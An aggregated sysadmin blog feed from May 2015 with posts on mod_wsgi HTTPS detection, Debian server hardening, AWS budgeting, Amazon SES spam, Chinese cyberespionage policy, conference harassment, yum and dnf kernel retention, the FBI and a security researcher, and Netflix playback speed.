Planet SysAdmin

May 24, 2015

Chris Siebenmann

A mod_wsgi problem with serving both HTTP and HTTPS from the same WSGI app

This is kind of a warning story. It may not be true any more (I believe that I ran into this back in 2013, probably with a 3.x version of mod_wsgi), but it's probably representative of the kind of things that you can run into with Python web apps in an environment that mixes HTTP and HTTPS.

Once upon a time I tried converting my personal site from lighttpd plus a CGI based lashup for DWiki to Apache plus mod_wsgi serving DWiki as a WSGI application. At the time I had not yet made the decision to push all (or almost all) of my traffic from HTTP to HTTPS; instead I decided to serve both HTTP and HTTPS alongside each other. The WSGI configuration I set up for this was, I felt, pretty straightforward. Outside of any particular virtual host stanza, I defined a single WSGI daemon process for my application and said to put everything in it:

WSGIDaemonProcess cspace2 user=... processes=15 threads=1 maximum-requests=500 ...
WSGIProcessGroup cspace2

Then in each of the HTTP and HTTPS versions of the site I defined appropriate Apache stuff to invoke my application in the already defined WSGI daemon process. This was exactly the same in both sites, because the URLs and everything were the same:

WSGIScriptAlias /space ..../cspace2.wsgi
<Directory ...>
   WSGIApplicationGroup cspace2
</Directory>

(Yes, this is what is by now old syntax and may have been old even back at the time; today you'd specify the process group and/or the application group in the WSGIScriptAlias directive.)

This all worked and I was happy. Well, I was happy for a while. Then I noticed that sometimes my HTTPS site was serving URLs that had HTTP URLs in links and vice versa. In fact, what was happening is that some of the time the application was being accessed over HTTPS but thought it was using HTTP, and sometimes it was the other way around. I didn't go deep into diagnosis because other factors intervened, but my operating hypothesis was that when a new process was forked off and handled its first request it then latched whichever of HTTP or HTTPS the request had been made through and used that for all of the remaining requests it handled.

(This may have been related to my mistake about how a WSGI app is supposed to find out about HTTP versus HTTPS.)

This taught me a valuable lesson about mixing WSGI daemon processes and so on across different contexts, which is that I probably don't want to do that. It's tempting, because it reduces the number of total WSGI related processes that are rattling around my systems, but even apart from Unix UID issues it's clear that mod_wsgi has a certain amount of mixture across theoretically separate contexts. Even if this is a now-fixed mod_wsgi issue, well, where there's one issue there can be more. As I've found out myself, keeping things carefully separate is hard work and is prone to accidental slipups.

(It's also possible that this is a mod_wsgi configuration mistake on my part, which I can believe; I'm not entirely sure I understand the distinction between 'process group' and 'application group', for example. The possibility of such configuration mistakes is another reason to keep things as separate as possible in the future.)

by cks at May 24, 2015 05:06 AM

The right way for your WSGI app to know if it's using HTTPS

Suppose that you have a WSGI application that's running under Apache, either directly as a CGI-BIN through some lashup or perhaps through an (old) version of mod_wsgi (such as Django on an Ubuntu 12.04 host, which has mod_wsgi version 3.3). Suppose that you want to know if you're being invoked via a HTTPS URL, either for security purposes or for your own internal reasons (for example, you might need separate page caches for HTTP versus HTTPS requests). What is the correct way to do this?

If you're me, for a long time you do the obvious thing; you look at the HTTPS environment variable that your WSGI application inherits from Apache (or the web server of your choice, if you're also running things under an alternate). If it has the value on or sometimes 1, you've got a HTTPS connection; if it doesn't exist or has some other value, you don't.

As I learned recently by reading some mod_wsgi release notes, this is in practice wrong (and probably wrong even in theory). What I should be doing is checking wsgi.url_scheme from the (WSGI) environment to see if it was "https" or "http". Newer versions of mod_wsgi explicitly strip the HTTPS environment variable and anyways, as the WSGI PEP makes clear, including a HTTPS environment variable was always a 'maybe' thing.

(You can argue that mod_wsgi is violating the spirit of the 'should' in the PEP here, but I'm sure it has its reasons for this particular change.)

Not using wsgi.url_scheme was always kind of conveniently lazy; I was pretending that WSGI was still basically a CGI-BIN environment when it's not really. I always should have been preferring wsgi. environment variables where they were available, and wsgi.url_scheme has always been there. But I change habits slowly when nothing smacks me over the nose about them.
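As a minimal sketch of the portable check (the application and its response bodies here are made up, but environ['wsgi.url_scheme'] is the standard WSGI key):

```python
def application(environ, start_response):
    # Prefer wsgi.url_scheme over the legacy HTTPS CGI variable; newer
    # mod_wsgi strips HTTPS, and the WSGI PEP only ever made it optional.
    is_https = environ.get('wsgi.url_scheme', 'http') == 'https'
    body = b'secure' if is_https else b'insecure'
    start_response('200 OK', [('Content-Type', 'text/plain'),
                              ('Content-Length', str(len(body)))])
    return [body]

# Exercise it with hand-built environs; no web server needed.
print(application({'wsgi.url_scheme': 'https'}, lambda s, h: None))
print(application({'wsgi.url_scheme': 'http'}, lambda s, h: None))
```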

(This may have been part of a mod_wsgi issue I ran into at one point, but that's another entry.)

by cks at May 24, 2015 05:05 AM

May 23, 2015


An Irrelevant Thesis

This week The Diplomat published an article by Dr Greg Austin titled What the US Gets Wrong About Chinese Cyberespionage. The subtitle teases the thesis: "Is it government policy in China to pass on commercial secrets obtained via cyberespionage to civil sector firms?" As you might expect (because it prompted me to write this post), the author's answer is "no."

The following contains the argument:

"Chinese actors may be particularly adept in certain stages of economic espionage, but it is almost certainly not Chinese government policy to allow the transfer of trade secrets collected by highly classified intelligence sources to its civil sector firms for non-military technologies on a wide-spread basis.

A U.S. influencing strategy toward China premised on the claim that this is China’s policy would appear to be ill-advised based on the evidence introduced so far by the United States in the public domain." (emphasis added)

I find it interesting that the author concedes theft by Chinese government actors, which the Chinese government refuses to acknowledge. However, the author seeks to excuse this activity out of concern for the effect it has on US-China ties.

One aspect of the relationship between China and the US worries the author most:

"There are many ways to characterize the negative impact on potential bilateral cooperation on cyberspace issues of the “lawfare” being practised by the United States to discipline China for its massive cyber intrusions into the commercial secrets of U.S. firms. One downside is in my view more important than others. This is the belief being fostered by U.S. officials among elites in the United States and in other countries that China as a nation is a “cheater” country..."

Then, in a manner similar to the way Chinese spokespeople respond to any Western accusations of wrongdoing, the author turns the often-heard "Chinese espionage as the largest transfer of wealth in history" argument against the US:

"In the absence of any Administration taxonomy of the economic impacts of cyber espionage, alleged by some to represent the largest illicit transfer of wealth in human history, one way of evaluating it is to understand that for more than three decades it has been U.S. policy, like that of its principal allies, to undertake the largest lawful transfer of wealth in human history through trade with, investment in and technology transfer to China."

(I'm not sure I understand the cited benefits the US has accrued due to this "largest lawful transfer of wealth in human history," given the hollowing out of the American manufacturing sector and the trade imbalance with China, which totaled over $82 billion in 1Q15 alone. It's possible I am not appreciating what the author means though.)

Let's accept, for argument's sake, that it is not "official" Chinese government policy for its intelligence and military forces to steal commercial data from private and non-governmental Western organizations. How does accepting that proposition improve the situation? Would China excuse the US government if a "rogue" element of the American intelligence community or military pursued a multi-decade campaign against Chinese targets?

Even if the US government accepted this "Chinese data theft by rogue government actor" theory, it would not change the American position: stop this activity, by whatever means necessary. Given the power amassed by President Xi during his anti-corruption crackdown, I would expect he would be able to achieve at least some success in limiting his so-called "rogue actors" during the 2+ years since Mandiant released the APT1 report. As Nicole Perlroth reported this month, Chinese hacking continues unabated. In fact, China has introduced new capabilities, such as the so-called Great Cannon, used to degrade GitHub and others.

Similar to the argument I made in my post What Does "Responsibility" Mean for Attribution?, "responsibility" is the key issue. Based on my experience and research, I submit that Chinese computer network exploitation of private and non-governmental Western organizations is "state-integrated" and "state-executed." Greg Austin believes the activity is, at worst, "state-rogue-conducted." Stepping down one rung on the state responsibility spectrum is far from enough to change US government policy towards China.

Note: In addition to the article in The Diplomat, the author wrote a longer paper titled China’s Cyberespionage: The National Security Distinction and U.S. Diplomacy (pdf).

I also plan to read Dr Austin's new book, Cyber Policy in China, which looks great! Who knows, we might even be able to collaborate, given his work with the War Studies department at KCL.

by Richard Bejtlich at May 23, 2015 04:49 PM

Feeding the Cloud

Usual Debian Server Setup

I manage a few servers for myself, friends and family as well as for the Libravatar project. Here is how I customize recent releases of Debian on those servers.

Hardware tests

apt-get install memtest86+ smartmontools e2fsprogs

Prior to spending any time configuring a new physical server, I like to ensure that the hardware is fine.

To check memory, I boot into memtest86+ from the grub menu and let it run overnight.

Then I check the hard drives using:

smartctl -t long /dev/sdX
badblocks -swo badblocks.out /dev/sdX


apt-get install etckeeper git sudo vim

To keep track of the configuration changes I make in /etc/, I use etckeeper to keep that directory in a git repository and make the following changes to the default /etc/etckeeper/etckeeper.conf:

  • turn off daily auto-commits
  • turn off auto-commits before package installs

To get more control over the various packages I install, I change the default debconf level to medium:

dpkg-reconfigure debconf

Since I use vim for all of my configuration file editing, I make it the default editor:

update-alternatives --config editor


apt-get install openssh-server mosh fail2ban

Since most of my servers are set to UTC time, I like to use my local timezone when sshing into them. Looking at file timestamps is much less confusing that way.

I also ensure that the locale I use is available on the server by adding it to the list of generated locales:

dpkg-reconfigure locales

Other than that, I harden the ssh configuration and end up with the following settings in /etc/ssh/sshd_config (jessie):

HostKey /etc/ssh/ssh_host_ed25519_key
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key


UsePrivilegeSeparation sandbox

AuthenticationMethods publickey
PasswordAuthentication no
PermitRootLogin no

AcceptEnv LANG LC_* TZ
AllowGroups sshuser

or the following for wheezy servers:

HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
KexAlgorithms ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512,hmac-sha2-256

On those servers where I need duplicity/paramiko to work, I also add the following:

KexAlgorithms ...,diffie-hellman-group-exchange-sha1
MACs ...,hmac-sha1

Then I remove the "Accepted" filter in /etc/logcheck/ignore.d.server/ssh (first line) to get a notification whenever anybody successfully logs into my server.

I also create a new group and add the users that need ssh access to it:

addgroup sshuser
adduser francois sshuser

and add a timeout for root sessions by putting this in /root/.bash_profile:

TMOUT=600

Security checks

apt-get install logcheck logcheck-database fcheck tiger debsums
apt-get remove john john-data rpcbind tripwire

Logcheck is the main tool I use to keep an eye on log files, which is why I add a few additional log files to the default list in /etc/logcheck/logcheck.logfiles:


while ensuring that the apache logfiles are readable by logcheck:

chmod a+rx /var/log/apache2
chmod a+r /var/log/apache2/*

and fixing the log rotation configuration by adding the following to /etc/logrotate.d/apache2:

create 644 root adm

I also modify the main logcheck configuration file (/etc/logcheck/logcheck.conf):


Other than that, I enable daily checks in /etc/default/debsums and customize a few tiger settings in /etc/tiger/tigerrc:

Tiger_Running_Procs='rsyslogd cron atd /usr/sbin/apache2 postgres'

General hardening

apt-get install harden-clients harden-environment harden-servers apparmor apparmor-profiles apparmor-profiles-extra

While the harden packages are configuration-free, AppArmor must be manually enabled:

perl -pi -e 's,GRUB_CMDLINE_LINUX="(.*)"$,GRUB_CMDLINE_LINUX="$1 apparmor=1 security=apparmor",' /etc/default/grub

Entropy and timekeeping

apt-get install haveged rng-tools ntp

To keep the system clock accurate and increase the amount of entropy available to the server, I install the above packages and add the tpm_rng module to /etc/modules.

Preventing mistakes

apt-get install molly-guard safe-rm sl

The above packages are all about catching mistakes (such as accidental deletions). However, in order to extend the molly-guard protection to mosh sessions, one needs to manually apply a patch.

Package updates

apt-get install apticron unattended-upgrades deborphan debfoster apt-listchanges update-notifier-common aptitude popularity-contest

These tools help me keep packages up to date and remove unnecessary or obsolete packages from servers. On Rackspace servers, a small configuration change is needed to automatically update the monitoring tools.

In addition to this, I use the update-notifier-common package along with the following cronjob in /etc/cron.daily/reboot-required:

cat /var/run/reboot-required 2> /dev/null || true

to send me a notification whenever a kernel update requires a reboot to take effect.

Handy utilities

apt-get install renameutils atool iotop sysstat lsof mtr-tiny

Most of these tools are configuration-free, except for sysstat, which requires enabling data collection in /etc/default/sysstat to be useful.

Apache configuration

apt-get install apache2-mpm-event

While configuring apache is often specific to each server and the services that will be running on it, there are a few common changes I make.

I enable these in /etc/apache2/conf.d/security:

<Directory />
    AllowOverride None
    Order Deny,Allow
    Deny from all
</Directory>

ServerTokens Prod
ServerSignature Off

and remove cgi-bin directives from /etc/apache2/sites-enabled/000-default.

I also create a new /etc/apache2/conf.d/servername which contains:

ServerName machine_hostname


apt-get install postfix

Configuring mail properly is tricky but the following has worked for me.

In /etc/hostname, put the bare hostname (no domain), but in /etc/mailname put the fully qualified hostname.

Change the following in /etc/postfix/

inet_interfaces = loopback-only
myhostname = (fully qualified hostname)
smtp_tls_security_level = may
smtp_tls_protocols = !SSLv2, !SSLv3

Set the following aliases in /etc/aliases:

  • set francois as the destination of root emails
  • set an external email address for francois
  • set root as the destination for www-data emails

before running newaliases to update the aliases database.

Create a new cronjob (/etc/cron.hourly/checkmail):

ls /var/mail

to ensure that email doesn't accumulate unmonitored on this box.

Finally, set reverse DNS for the server's IPv4 and IPv6 addresses and then test the whole setup using mail root.

Network tuning

To reduce the server's contribution to bufferbloat I change the default kernel queueing discipline (jessie or later) by putting the following in /etc/sysctl.conf:

net.core.default_qdisc = fq_codel

May 23, 2015 09:00 AM


UnicodeEncodeError: 'ascii' codec can't encode character u'\u2019'

Once again I was working on some Python code for EVE Online. This particular bit of code gathers a list of kills for a particular region and then summarizes that data in a daily report. Everything had been working properly, until one day...

Traceback (most recent call last):
  File "/Users/scott/Dev/Scripts/Slaptijack/EVE/loss_report/", line 163, in <module>
    main()
  File "/Users/scott/Dev/Scripts/Slaptijack/EVE/loss_report/", line 159, in main
    print(template.render(context))
UnicodeEncodeError: 'ascii' codec can't encode character u'\u2019' in position 6711: ordinal not in range(128)

The problem was in my Item class. My name() method (which was also used by __str__() and __unicode__()) was throwing this error on the name of a particular item that included a non-ASCII character. The trick was to encode() the text when returning from name():

class Item(object):
    # ...snip...
    def name(self):
        # ...snip....
        return self.crest_type['name'].encode('utf-8')
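The failure is easy to reproduce standalone (this sketch uses a made-up item name rather than real EVE data; U+2019 is a right single quotation mark, which the ascii codec cannot represent):

```python
name = u"Punisher\u2019s Hull"  # hypothetical item name containing U+2019

# Encoding with the default ascii codec fails...
try:
    name.encode('ascii')
    raised = False
except UnicodeEncodeError:
    raised = True

# ...while encoding to UTF-8 succeeds and round-trips cleanly.
utf8 = name.encode('utf-8')
print(raised, utf8.decode('utf-8') == name)  # True True
```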

If you like the idea of a video game you can write code against, check out EVE Online's free trial. That link will give you 21 days free versus the usual 14.

Related Reading:

by Scott Hebert at May 23, 2015 03:00 AM

May 22, 2015


Moving from traditional budgeting to AWS-style budgeting

I've seen this dynamic happen a couple of times now. It goes kind of like this.

October: We're going all in on AWS! It's the future. Embrace it.
November: IT is working very hard on moving us there, thank you for your patience.
December: We're in! Enjoy the future.
January: This AWS bill is intolerable. Turn off everything we don't need.
February: Stop migrating things to AWS, we'll keep these specific systems on-prem for now.
March: Move these systems out of AWS.
April: Nothing gets moved to AWS unless it produces more revenue than it costs to run.

What's prompting this is a shock that is entirely predictable, but manages to penetrate the reality distortion field of upper management because the shock is to the pocketbook. They notice that kind of thing. To illustrate what I'm talking about, here is a made-up graph showing technology spend over a course of several years.

The AWS line actually results in more money over time, as AWS does a good job of capturing costs that the traditional method generally ignores or assumes is lost in general overhead. But the screaming doesn't happen at the end of four years when they run the numbers, it happens in month four when the ongoing operational spend after build-out is done is w-a-y over what it used to be.

The spikes for traditional on-prem work are for forklifts of machinery showing up. Money is spent, new things show up, and they impact the monthly spend only infrequently. In this case, the base-charge increased only twice over the time-span. Some of those spikes are for things like maintenance-contract renewals, which don't impact base-spend one whit.

The AWS line is much less spiky, as new capabilities are absorbed into the base budget on an ongoing basis. You're no longer dropping $125K in a single go, you're dribbling it out over the course of a year or more. AWS price-drops mean that monthly spend actually goes down a few times.

Pay only for what you use!

Amazon is great at pointing that out, and highlighting the convenience of it. But what they don't mention is that by doing so, you will learn the hard way about what it is you really use. The AWS Calculator is an awesome tool, but if you don't know how your current environment works, it's like throwing darts at a wall for accurately predicting what you'll end up spending. You end up obsessing over small line-item charges you've never had to worry about before (how many IOPs do we do? Crap! I don't know! How many thousands will that cost us?), and missing the big items that nail you (Whoa! They meter bandwidth between AZs? Maybe we shouldn't be running our Hadoop cluster in multi-AZ mode).

There is a reason that third party AWS integrators are a thriving market.

Also, this 'what you use' is not subject to Oops exceptions without a lot of wrangling with Account Management. Have something that downloaded the entire EPEL repo twice a day for a month, and only learned about it when your bandwidth charge was 9x what it should be? Too bad, pay up or we'll turn the account off.

Unlike the forklift model, you pay for it every month without fail. If you have a bad quarter, you can't just not pay the bill for a few months and true up later. You're spending it, or they're turning your account off. This takes away some of the cost-shifting flexibility the old style had.

Unlike the forklift model, AWS prices its stuff assuming a three year turnover rate. Many companies have a 5 to 7 years lifetime for IT assets. Three to four years in production, with an afterlife of two to five years in various pre-prod, mirror, staging, and development roles. The cost of those assets therefore amortizes over 5-9 years, not 3.
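The arithmetic behind that amortization gap can be sketched with made-up numbers (the $125K figure echoes the forklift example above; the lifetimes are assumptions, not data from any real deployment):

```python
capex = 125_000.0  # hypothetical cost of one hardware forklift

def monthly_cost(total, years):
    """Straight-line amortization: spread a one-time cost over N years."""
    return total / (years * 12)

# Priced on a cloud-style 3-year turnover vs. a 7-year on-prem lifetime
# (3-4 years in production plus an afterlife in staging/dev roles):
print(round(monthly_cost(capex, 3), 2))  # roughly 3472 per month
print(round(monthly_cost(capex, 7), 2))  # under 1500 per month
```

The same dollar of hardware looks more than twice as expensive per month when it has to pay for itself in three years.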

Predictable spending, at last.


Yes, it is predictable over time given accurate understanding of what is under management. But when your initial predictions end up being wildly off, it seems like it isn't predictable. It seems like you're being held over the coals.

And when you get a new system into AWS and the cost forecast is wildly off, it doesn't seem predictable.

And when your system gets the rocket-launch you've been craving and you're scaling like mad; but the scale-costs don't match your cost forecast, it doesn't seem predictable.

It's only predictable if you fully understand the cost items and how your systems interact with it.

Reserved instances will save you money

Yes! They will! Quite a lot of it, in fact. They let a company go back to the forklift-method of cost-accounting, at least for part of it. I need 100 m3.large instances, on a three year up-front model. OK! Monthly charges drop drastically, and the monthly spend chart begins to look like the old model again.


Reserved instances cost a lot of money up front. That's the point, that's the trade-off for getting a cheaper annual spend. But many companies get into AWS because they see it as cheaper than on-prem. Which means they're sensitive to one-month cost-spikes, which in turn means buying reserved instances doesn't happen and they stay on the high cost on-demand model.

AWS is Elastic!

Elastic in that you can scale up and down at will, without week/month long billing, delivery and integration cycles.

Elastic in that you have choice in your cost accounting methods. On-demand, and various kinds of reserved instances.

It is not elastic in when the bill is due.

It is not elastic with individual asset pricing, no matter how special you are as a company.

All of these things trip up upper, non-technical management. I've seen it happen three times now, and I'm sure I'll see it again at some point.

Maybe this will help you in illuminating the issues with your own management.

by SysAdmin1138 at May 22, 2015 03:37 PM

Debian Administration

Preventing SPAM connections with bird.

Bird is an Internet routing daemon with full support for all the major routing protocols. It allows you to configure hosts to share routing information, via protocols such as BGP, OSPF, or even statically. Here we're going to look at using it to automatically blacklist traffic from SPAM-sources.

by Steve at May 22, 2015 07:25 AM

Chris Siebenmann

Unsurprisingly, Amazon is now running a mail spamming service

I recently got email from an machine, cheerfully sending me a mailing list message from some random place that desperately wanted me to know about their thing. It was, of course, spam, which means that Amazon is now in the business of running a mail spamming service. Oh, Amazon doesn't call what they're running a mail spamming service, but in practice that's what it is.

For those that have not run into it, is 'Amazon Simple Email Service', where Amazon carefully sends out email for you in a way that is designed to get as much of it delivered as possible and to let you wash annoying people who complain out of your lists as effectively as possible (which probably includes forwarding complaints from those people to you, which is something that has historically caused serious problems for people who file complaints due to spammer retaliation). I translate from the marketing language on their website, of course.

In the process of doing this, Amazon sends from their own IP address space, using their own HELO names, their own domain name, and completely opaque sender envelope address information. Want to get some email sent through but not the email from spammers you've identified? You're plain out of luck at the basic SMTP level; your only option is to parse the actual message during the DATA phase and look for markers. Of course this helps spammers, since they get a free ride on the fact that you may not be able to block email in general.

I'm fairly sure that Amazon does not deliberately want to run a mail spamming service. It's just that, as usual, not running a mail spamming service would cost them too much money and too much effort and they are in a position to not actually care. So everyone else gets to lose. Welcome to the modern Internet email environment, where receiving email from random strangers to anything except disposable email addresses gets to be more and more of a problem every year.

(As far as I can tell, Amazon does not even require you to use their own mailing list software, managed by Amazon so that Amazon can confirm subscriptions and monitor things like that. You're free to roll your own mail blast software and as far as I can tell my specific spammer did.)

by cks at May 22, 2015 05:05 AM

May 20, 2015

Everything Sysadmin

Design Patterns for being creepy: Playing The Odds

Recently a friend told me this story. She had given a presentation at a conference and soon after started receiving messages from a guy who wanted to talk more about the topic. He was very insistent that she was the only person who would understand his situation. Not wanting to be rude, she offered to continue over email, but he wanted to meet in person. His requests became more and more demanding over time. It became obvious that he wasn't looking for mentoring or advice. He wanted a date.

She had no interest in that.

Unsure what to do, she asked a few other female attendees for advice. What a surprise to discover that the same guy had also contacted them and was playing the same game. In fact, she later found out that 5 women who had attended the conference were receiving the same treatment.

Yes. Really.

Wait... it gets worse.

This is the third conference where I've seen this happen. This isn't just a problem with one particular conference or even one kind of conference.

So, it isn't a coincidence, this is an M.O.

I call this pattern "playing the odds". You approach every woman that attends a conference assuming that the odds are good that at least one will say "yes".

I'm not sure what is more insulting: the assumption that any female speaker is automatically available or interested in dating, or that the women wouldn't see right through him.

The good news in all three cases is that the conference organizers handled the situation really well once they were aware of the situation.

So, guys, if you ever think you are the first person to think of doing this, I have some sad news for you. First, you aren't the first. Second, it won't work.

To the women that speak at conferences, now that you know this is a thing, I hope it is easier to spot.

The problem is that there is no transparency in the system. It isn't obvious if the guy is doing this to a lot of women because sharing such information is difficult. It would be uncomfortable to share this information. There are many privacy concerns, in particular if the guy was contacting the women for legitimate reasons, a false-positive being publicly announced would be... bad.

If only there was a confidential service where people could register "so-and-so is contacting me saying x-y-z". If multiple people reported the same thing, it would let all parties know.

I was considering offering such a service. The implementation would be quite simple. I would set up an email inbox. Women would send messages with a subject line that contained the person's email address, name, and whether their approach was "maybe" or "very" creepy. I would check the inbox daily. For example my inbox might look like this:

Subject: Joe Baker  maybe
Subject: Mark Jones  maybe
Subject: Ken Art  maybe
Subject: Mark Jones  maybe
Subject: Ryan Example  very
Subject: Mark Jones  maybe
Subject: Mark Jones maybe

If I saw those Subject lines, I would alert the parties involved that Mark Jones seems to be on the prowl. The service wouldn't be entirely confidential, but I would do the best I could.
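The manual tally itself is simple enough to sketch (the names come from the example subject lines above; treating the last word of the subject as the severity is my own assumption about the format):

```python
from collections import Counter

subjects = [
    "Joe Baker maybe",
    "Mark Jones maybe",
    "Ken Art maybe",
    "Mark Jones maybe",
    "Ryan Example very",
    "Mark Jones maybe",
    "Mark Jones maybe",
]

def flag_repeat_offenders(subjects, threshold=2):
    # Subject format: "<name> <maybe|very>"; count reports per name
    # and flag anyone reported by more than one person.
    counts = Counter(s.rsplit(None, 1)[0] for s in subjects)
    return sorted(name for name, n in counts.items() if n >= threshold)

print(flag_repeat_offenders(subjects))  # ['Mark Jones']
```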

Then I realized I could build a system that would require zero human interaction and only be slightly less accurate. It would be a website called "" and it would be a static web page that displays the word "yes". True, it wouldn't be 100 percent accurate but exactly how much less accurate is difficult to determine. If you have to ask, the answer is probably "yes".

Jokes aside, maybe someone with better programming skills could come up with an automated system that protects everyone's privacy, is secure, and strikes the right balance between transparency, privacy, and accuracy.

I'm not one of the people who is directly affected by this sort of thing, so if my thinking on these solutions is off base, I'm eager to hear it.

In the meanwhile, I'm holding on to that domain.

May 20, 2015 06:52 PM

Racker Hacker

You have a problem and isn’t one of them

I really enjoy operating and the other domains. It’s fun to run some really busy services and find ways to reduce resource consumption and the overall cost of hosting.

My brain has a knack for optimization and improving the site is quite fun for me. So much so that I’ve decided to host all of out of my own pocket starting today.

However, something seriously needs to change.

A complaint came in yesterday from someone who noticed that their machines were making quite a few requests to It turns out there was a problem with malware and the complaint implicated my site as part of the problem. One of my nodes was taken down as a precaution while I furiously worked to refute the claims within the complaint. Although the site stayed up on other nodes, it was an annoyance for some and I received a few tweets and emails about it.

Long story short, if you’re sending me or my ISP a complaint about, there’s one thing you need to know: the problem is on your end, not mine. Either you have users making legitimate requests to my site or you have malware actively operating on your network.

No, it’s not time to panic.

You can actually use as a tool to identify problems on your network.

For example, add rules to your intrusion detection systems (IDS) to detect requests to the site in environments where you don’t expect those requests to take place. Members of your support team might use the site regularly to test things but your Active Directory server shouldn’t start spontaneously talking to my site overnight. That’s a red flag and you can detect it easily.
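A sketch of that detection idea, using `` as a stand-in domain and made-up hostnames (a real deployment would hook this into IDS rules or proxy/DNS logs rather than a Python list):

```python
# Hosts that are expected to use the lookup site, e.g. the support team.
expected = {"support-desk-01", "support-desk-02"}

# Hypothetical proxy log lines: "<client-host> <method> <url>".
log_lines = [
    "support-desk-01 GET",
    "ad-controller-03 GET",  # an AD server should not do this
]

def unexpected_clients(lines, expected, site=""):
    # Flag any client contacting the site that is not on the allowlist.
    clients = {line.split()[0] for line in lines if site in line}
    return sorted(clients - expected)

print(unexpected_clients(log_lines, expected))  # ['ad-controller-03']
```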

Also, don’t report the site as malicious or hosting malware when it’s not. I’ve been accused of distributing malware and participating in attacks but then, after further investigation, it was discovered that I was only returning an IPv4 address to a valid request. That hardly warrants the blind accusations that I often receive.

I’ve taken some steps to ensure that there’s a way to contact me with any questions or concerns you might have. For example:

  • You can email the abuse, postmaster, and security addresses at any time
  • There’s an HTTP header with a link to the FAQ (which has been there for years)
  • I monitor any tweets or blog posts that are written about the site

As always, if you have questions or concerns, please reach out to me and read the FAQ. Thanks to everyone for all the support!

Photo Credit: Amir Kamran via Compfight cc


by Major Hayden at May 20, 2015 12:50 PM

May 18, 2015

Racker Hacker

Keep old kernels with yum and dnf

When you upgrade packages on Red Hat, CentOS and Fedora systems, the newer package replaces the older package. That means that files managed by RPM from the old package are removed and replaced with files from the newer package.

There’s one exception here: kernel packages.

Upgrading a kernel package with yum and dnf leaves the older kernel package on the system just in case you need it again. This is handy if the new kernel introduces a bug on your system or if you need to work through a compile of a custom kernel module.

However, yum and dnf will clean up older kernels once you have more than three. The oldest kernel will be removed from the system and the newest three will remain. In some situations, you may want more than three to stay on your system.

To change the setting, simply open up /etc/yum.conf or /etc/dnf/dnf.conf in your favorite text editor. Look for this line:

installonly_limit=3

To keep five kernels, simply replace the 3 with a 5. If you’d like to keep every old kernel on the system forever, just change the 3 to a 0. A zero means you never want “installonly” packages (like kernels) to be removed from your system.
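As a sketch, the whole change is a one-line edit. Here it is demonstrated against a throwaway copy of the file so nothing real is touched (the real path is /etc/yum.conf or /etc/dnf/dnf.conf):

```shell
# Work on a scratch copy of the config file.
conf=/tmp/dnf.conf.example
printf '[main]\ninstallonly_limit=3\n' > "$conf"

# Keep five kernels instead of three.
sed -i 's/^installonly_limit=3$/installonly_limit=5/' "$conf"

grep '^installonly_limit' "$conf"
```

The final grep confirms the new value, printing `installonly_limit=5`.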


by Major Hayden at May 18, 2015 02:22 PM

May 17, 2015

Errata Security

Our Lord of the Flies moment

In its war on researchers, the FBI doesn't have to imprison us. Merely opening an investigation into a researcher is enough to scare away investors and bankrupt their company, which is what happened last week with Chris Roberts. The scary thing about this process is that the FBI has all the credibility, and the researcher none -- even among other researchers. After hearing only one side of the story, the FBI's side, cybersecurity researchers quickly turned on their own, condemning Chris Roberts for endangering lives by taking control of an airplane.

As reported by Kim Zetter at Wired, though, Roberts denies the FBI's allegations. He claims his comments were taken out of context, and that on the subject of taking control of a plane, it was in fact a simulator, not a real airplane.

I don't know which side is telling the truth, of course. I'm not going to defend Chris Roberts in the face of strong evidence of his guilt. But at the same time, I demand real evidence of his guilt before I condemn him. I'm not going to take the FBI's word for it.

We know how things get distorted. Security researchers are notoriously misunderstood. To the average person, what we say is all magic technobabble anyway. They find this witchcraft threatening, so when we say we "could" do something, it's interpreted as a threat that we "would" do something, or even that we "have" done something. Important exculpatory details, like "I hacked a simulation", get lost in all the technobabble.

Likewise, the FBI is notoriously dishonest. Until last year, they forbade audio/visual recording of interviews, preferring instead to take notes. This enshrines any misunderstandings in the official record. The FBI has long abused this, such as for threatening people into informing on friends. It is unlikely the FBI had the technical knowledge to understand what Chris Roberts said. It's likely they willfully misunderstood him in order to justify a search warrant.

There is a war on researchers. What we do embarrasses the powerful. They will use any means possible to stop us, such as using the DMCA to suppress publication of research, or using the CFAA to imprison researchers. Criminal prosecution is so one sided that it rarely gets that far. Instead, merely the threat of prosecution ruins lives, getting people fired or bankrupted.

When they come for us, the narrative will never be on our side. They will have constructed a story that makes us look very bad indeed. It's scary how easily the FBI convicts people in the press. They have great leeway to concoct any story they want. Journalists then report the FBI's allegations as fact. The targets, who need to remain silent lest their words be used against them, can do little to defend themselves. It's like the Matt Dehart case, where the FBI alleges child pornography. But when you look into the details, it's nothing of the sort. The mere taint of this makes people run from supporting Dehart. Similarly with Chris Roberts, the FBI wove a tale of endangering an airplane, based on no evidence, and everyone ran from him.

We need to stand together or fall alone. No, this doesn't mean ignoring malfeasance on our side. But it does mean that, absent clear evidence of guilt, we stand with our fellow researchers. We shouldn't go all Lord of the Flies on the accused, eagerly devouring Piggy because we are so relieved it wasn't us.

P.S. Alex Stamos is awesome, don't let my bitch slapping of him make you believe otherwise.

by Robert Graham at May 17, 2015 09:57 AM

May 16, 2015

Netflix streaming playback speed and hidden menus

Netflix and playback speed

I have always been interested in Netflix streaming, but I could not get over not being able to adjust the playback speed. That, and the movie selection stinks (out of 159 titles in my queue only 40 are available to be streamed). I still tried streaming for 30 days and really liked some of the original content Netflix had. During that time I did not find any native way to adjust the playback speed in their HTML5 player. This really stinks as I am used to watching video with VLC, YouTube, and MythTV, all of which allow for playback speed adjustment up to 2x. It is hard to watch anything at lower speeds anymore. After a bit more searching I finally found a way to change the playback speed in Netflix streaming video.

Chrome extension Video Speed Controller

After much searching I found a Google Chrome extension called Video Speed Controller, which allows for the speedup of HTML5 video streams in the browser. Netflix has an HTML5 player so this works with Netflix streams. Hooray!! The sped-up stream does not have any buffering issues and I've watched many things on Netflix at 2x playback without issue. Unfortunately you can't use this anywhere other than the browser. Come on Netflix, please add playback speed adjustment to all of your players on all platforms!!!

Performance at higher speeds

